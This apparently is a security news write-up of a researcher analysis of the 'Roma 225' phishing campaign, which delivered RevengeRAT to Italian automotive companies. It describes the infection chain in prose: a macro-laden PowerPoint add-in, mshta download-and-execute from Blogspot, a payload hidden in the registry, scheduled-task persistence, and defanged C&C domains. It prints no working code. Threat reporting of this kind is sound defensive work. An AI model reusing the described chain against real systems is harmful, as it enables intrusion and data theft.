Email phishing campaign ‘Roma 225’ targets companies in the Italian automotive sector

• Researchers recently observed a malware implant weaponized to target companies in the Italian automotive sector.
• The malware was propagated through spoofing email pretending to be from a senior partner of Veirano Advogados, a Brazilian business law firm.

Recently, researchers from the Cybaze-Yoroi ZLab observed and analyzed a malware implant weaponized to target companies in the Italian automotive sector. Researchers identified that the malware was propagated through spoofing email pretending to be from a senior partner of Veirano Advogados, a Brazilian business law firm.

More details on the analysis

The malicious phishing email observed during the CSDC operations contained a Microsoft PowerPoint add-in document (“.ppa” extension), equipped with auto-open VBA macro code.

The auto-open VBA macro code in the '.ppa' file contained a simple instruction utilizing the mshta.exe tool to download and execute the next stage of the malicious dropper retrieved from hxxps://minhacasaminhavidacdt[.]blogspot[.]com/.

The Blogspot-hosted web page downloaded by mshta.exe tool appears harmless from a quick review - opening it into the browser shows a perfectly rendered work-in-progress blog page. However, a deeper investigation of its source code reveals a VBScript code is hidden behind the blog page.

The malware author tried to attribute the pattern of the script to “Microsoft Corp.”, adding comments belonging to legitimate Microsoft utilities, Security Affairs reported.

“Update
Copyright: Microsoft Corp.

‘This script is designed to be used only for scheduled tasks(s).’
‘There is no extensive error check, and will not dump the output from the Powershell CmdLet.’
‘ Usage: SyncAppvPublishingServer {cmdline-args(passthrough to cmdlet)}’”

These comments were a part of the “SyncAppvPublishingServer” utility, commonly deployed into Windows 10 machines at “C:\Windows\System32\SyncAppvPublishingServer.vbs”. However, the remaining part of the script is responsible for executing a series of malicious actions such as:

• Storing a base64 encoded version of the “RevengeRAT” payload into registry key located at “HKCU\AppEvents\Values”.
• Decoding and executing of the stored payload.
• Creating and executing another VBScript into “%AppData%\Local\Temp\Z3j[.]vbs”, capable to downloading a new payload from the remote destination “hxxp://cdtmaster[.]com[.]br”.
• The creation of a new task running the “mshta.exe” utility with the “hxxps://pocasideiascdt[.]blogspot[.]com/” parameter every two hours. This URL redirects to a web page which is a mirror of the “https://minhacasaminhavidacdt[.]blogspot[.]com/” one.

Once executed, the Revenge RAT immediately contacts its C&C servers sending victim system’s information. In the analyzed sample, the malware author has configured two different C&C destinations: “office365update[.]duckdns[.]org” and “systen32[.]ddns[.]net“.

If one of these servers is down, then the malware contacts the other one. At the time of writing, both the remote C&C servers were down, so it was only possible for the researchers to emulate the server behavior in order to analyze the information sent by the RAT. However, the malware establishes a TCP connection with the server.

Document.exe file

Researchers detected that the ‘Document.exe’ file was hosted at “cdtmaster[.]com[.]br” and was downloaded into the victim’s system by the “Z3j[.]vbs” script. This PE32 file is characterized by the Pokemon Megaball image used as a program icon and the purpose of the file is to deploy and run the “Outlook.exe” payload.

When the “Outlook.exe” payload is executed, it remains calm with no outgoing network traffic or file system modifications, but it binds a listening TCP socket on localhost: “tcp://127.0.0.1:49356“. However, researchers are still analyzing the Outlook.exe sample to extract its real behavior.

Conclusions

After the initial analysis, the researchers have not yet attributed the attack to any specific group. However, it is to be noted that the TTPs used by the threat actor are similar to other groups tracked by Unit 42 researchers. This included the use of similar infrastructure and several common files as well.

Further technical details about the Roma225 compaign, can be found in the analysis published on the Yoroi blog.